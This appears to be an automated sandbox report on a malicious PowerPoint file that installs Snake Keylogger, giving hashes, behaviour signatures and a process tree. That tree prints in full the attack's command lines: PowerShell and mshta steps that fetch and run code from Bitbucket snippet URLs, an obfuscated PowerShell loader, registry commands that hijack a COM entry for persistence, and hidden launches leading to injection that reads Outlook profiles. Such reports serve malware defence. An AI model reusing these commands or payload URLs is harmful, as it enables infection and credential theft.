Analysis
-
max time kernel
71s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
30-09-2022 06:11
General
-
Target
Order MGE-WJO-001.pps
-
Size
102KB
-
MD5
b47c0f0957935cfc3c27337b8f117d75
-
SHA1
1228ae88cfc7a2a80506cd2e4fb14f22a5f8d76c
-
SHA256
ae4932402776b79b18dac096d0afdcc986f7bef1459bfb9bb5675f2b074d8e04
-
SHA512
208edf3bf8dfb38d738a86db7a240c0ad985ed14b8f58435bcd945d4ca7904469c60bdcb3fb53f91d9f8d91d47c68b5ef26941b44cdb986959cc9e59e907e50e
-
SSDEEP
768:kf9BcTRDkSIOd0Xg4JbvsyEVK3/L1U82cY3/A5jEcjo:kutY1OmvsyEVKvL1U0WA5js
Malware Config
Extracted
https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 4 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 30 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\Order MGE-WJO-001.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/tinypro/LM4xGp/ed8727ba02924677655de204f9422df557005d3f/files/blessed-final.txt') -useB); Start-Sleep -Seconds 202⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/tinypro/LM4xGp/ed8727ba02924677655de204f9422df557005d3f/files/blessed-final.txt') -useB); Start-Sleep -Seconds 203⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /min mshta https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt5⤵
- Blocklisted process makes network request
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HPJSWDLAZGWFDZYDFHWGFRU = '[%9%{!)<60%7]643]%((!^]y%9%{!)<60%7]643]%((!^]t\+!{{@901}8-#+([)]#/=}&{0}#23{1=##<%9-+90*4+.IO.%9%{!)<60%7]643]%((!^]t{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6&{0}#23{1=##<%9-+90*4+{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6d\+!{{@901}8-#+([)]#/=}{)]<5/]9928(@-%*})\<$@]'.Replace('%9%{!)<60%7]643]%((!^]','S').Replace('\+!{{@901}8-#+([)]#/=}','E').Replace('{)]<5/]9928(@-%*})\<$@','R').Replace('_#=#9)<+/&53\+]}70#-*6','A').Replace('&{0}#23{1=##<%9-+90*4+','M');$HFVVYPXEVBJEIVAVHEPLSDU = ($HPJSWDLAZGWFDZYDFHWGFRU -Join '')|&('I'+'EX');$HKLNYCJAXBTERCXRLWVDDRR = '[$0[-_<#)(+}%]\3%7\(5&#y$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[+&=#*$)4$<3}!1<)@3##5=m.N+&=#*$)4$<3}!1<)@3##5=*^(!+72@//61)!18$/<%8[.W+&=#*$)4$<3}!1<)@3##5=bR+&=#*$)4$<3}!1<)@3##5=qu+&=#*$)4$<3}!1<)@3##5=$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[]'.Replace('$0[-_<#)(+}%]\3%7\(5&#','S').Replace('+&=#*$)4$<3}!1<)@3##5=','E').Replace('*^(!+72@//61)!18$/<%8[','T');$HHKOVSNBTTKFPLKUTNGTEHB = ($HKLNYCJAXBTERCXRLWVDDRR -Join '')|&('I'+'EX');$HTZCELDOJQNRIVJVBXAVZND = '\][0{2=!#**(#<)4$/{=^%r11+[/-}*(1}3(}]+(#)6[]a<!=7!}\7)9&$[[)/4/&[/&11+[/-}*(1}3(}]+(#)6[]'.Replace('\][0{2=!#**(#<)4$/{=^%','C').Replace('11+[/-}*(1}3(}]+(#)6[]','E').Replace('<!=7!}\7)9&$[[)/4/&[/&','T');$HJJPDTCBEJQGGUGWFGICSKF = '{!@{8=!@4!(52!5=$1_##*&5<22_0_)1\%*#}*(6[867tR&5<22_0_)1\%*#}*(6[867[={9}@&&6*48{8}6_+3%=*pon[={9}@&&6*48{8}6_+3%=*&5<22_0_)1\%*#}*(6[867'.Replace('{!@{8=!@4!(52!5=$1_##*','G').Replace('&5<22_0_)1\%*#}*(6[867','E').Replace('[={9}@&&6*48{8}6_+3%=*','S');$HYRGAIQZLYZNHUPAAKKHBKR = 'G!!((=#^55=^9&7^3$_4=1/t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@pon7({=\[#%*6@0088{}\43}@!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/am'.Replace('7({=\[#%*6@0088{}\43}@','S').Replace('!!((=#^55=^9&7^3$_4=1/','E').Replace('[%\*\][6!)-[8$5!41<#1_','R');$HSIYIVTRGVUTCUUELHVIWZX = '}2=29-^$/4!#%4_6^(9<@[&_/2\4*4=(\7_]}](4_\_)a^[<2_/^@429<&238}@][#=To&_/2\4*4=(\7_]}](4_\_)n^[<2_/^@429<&238}@][#='.Replace('}2=29-^$/4!#%4_6^(9<@[','R').Replace('&_/2\4*4=(\7_]}](4_\_)','E').Replace('^[<2_/^@429<&238}@][#=','D');&('I'+'EX')($HFVVYPXEVBJEIVAVHEPLSDU::new($HHKOVSNBTTKFPLKUTNGTEHB::$HTZCELDOJQNRIVJVBXAVZND('https://bitbucket.org/!api/2.0/snippets/tinypro/AMyBo5/7aa8070fad88ee97f746dc619bfe09d8d55d7840/files/blessed1.txt').$HJJPDTCBEJQGGUGWFGICSKF().$HYRGAIQZLYZNHUPAAKKHBKR()).$HSIYIVTRGVUTCUUELHVIWZX())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
531KB
MD5cf926b0be724d46e228175953d33a988
SHA14b87320b4a3b75be7414f82e3cc83abed0f2123b
SHA2563a0b71b1c003590b1eb5a0f5e5e1ccf5af14fca8a264ff1f01c153c2a3806e00
SHA512349ac83e0e2e14c6e9089020ce2c8f07800381840ea5ea574bc6b9ccf67ab603112efb9188950d495f1c18ffd36096aaf6a74d5bbaddc7a3ab13bc24ca7b3b40
-
Filesize
693B
MD55a52e1c0f7e19f6b96c875310238e048
SHA16a017b2933ffb51c025fce852abd0e356b0e2b1d
SHA25614e860c94a8664901099340f7a4f97362a64ef149a53e5df31a5a4d383a51d2a
SHA512ddeb3ffd4c2c88c264c6c3587a33ac229afd44ed3a82fcf244e3069e8e0a28be328fded4b40d438185ccacbefb5ccd5d1df40292be825b0f9587b63fbc781f5d
-
Filesize
3KB
MD521df908f451a93e32692c2fe8b34162e
SHA125f4e917312bf21ad9289348b682a292e657cc4d
SHA256ce05b804fdf14f27ab9617e55a7b431bba49325ae749a97a3ee9cff469b36e2e
SHA5126f4d3f109fec3a9d92f36fae2d1eb2bea4c59dbe2b73e92e7f2175f2ca985b9c71f8905d4e6589d4cc010497403729bf7b718efb437f47fd819f16d74bea5ace
-
Filesize
2KB
MD51f420d8b494afee108abdbdce860be6d
SHA106029153e26d9a107f5831ab001f3e43ae6d4aae
SHA25651bfac3e3d2230f21591bd59362c2f657a69614ea893a64644879f3010540275
SHA512bf1e5b622141bb19096f6b8674b92579d0a045f7919beebdcca57f620900836e43d06f17d938697924942b0746087ddad902129887b7da3788256c0a0356d217
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5592b9bc170338948688a1f3b9b3b8e48
SHA14ec4da4646cf17fe339add5017f880a66a37941c
SHA25605ecb5fb3ab4eabcba120f8dd0560e52e649d706173d4f80343514375e893b68
SHA512ca914f04a4c0ce8aac3b78602f6b9e04558270564a8a1f98528659c23a78d5caf64ceb1f6ac332178da2a1d8b7d9eb86ccd1a22f86e9b82a8a9d8f3e7a1b1858
-
Filesize
1KB
MD54631b887c495c16c5df3dc4e9720ffe7
SHA1f9e3dc9f3036a9b511adb945ab7e49c9ea6eae4d
SHA25621fe5d183d454c141ac12168cc988208abdacd2df20667865b83c0bc18f8b1e6
SHA5127bb9f7d7dc0abb2521d534989bae0aa5c4effc95b2565a51217eda009fd4f4354dff829d89ef40d8bc7303214b6ed4ba4524f271f1cda7b5ce9d016616fd112c
-
Filesize
1KB
MD54631b887c495c16c5df3dc4e9720ffe7
SHA1f9e3dc9f3036a9b511adb945ab7e49c9ea6eae4d
SHA25621fe5d183d454c141ac12168cc988208abdacd2df20667865b83c0bc18f8b1e6
SHA5127bb9f7d7dc0abb2521d534989bae0aa5c4effc95b2565a51217eda009fd4f4354dff829d89ef40d8bc7303214b6ed4ba4524f271f1cda7b5ce9d016616fd112c
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
104KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
152KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
1.8MB
-
Filesize
624KB
-
Filesize
5.6MB
-
Filesize
152KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB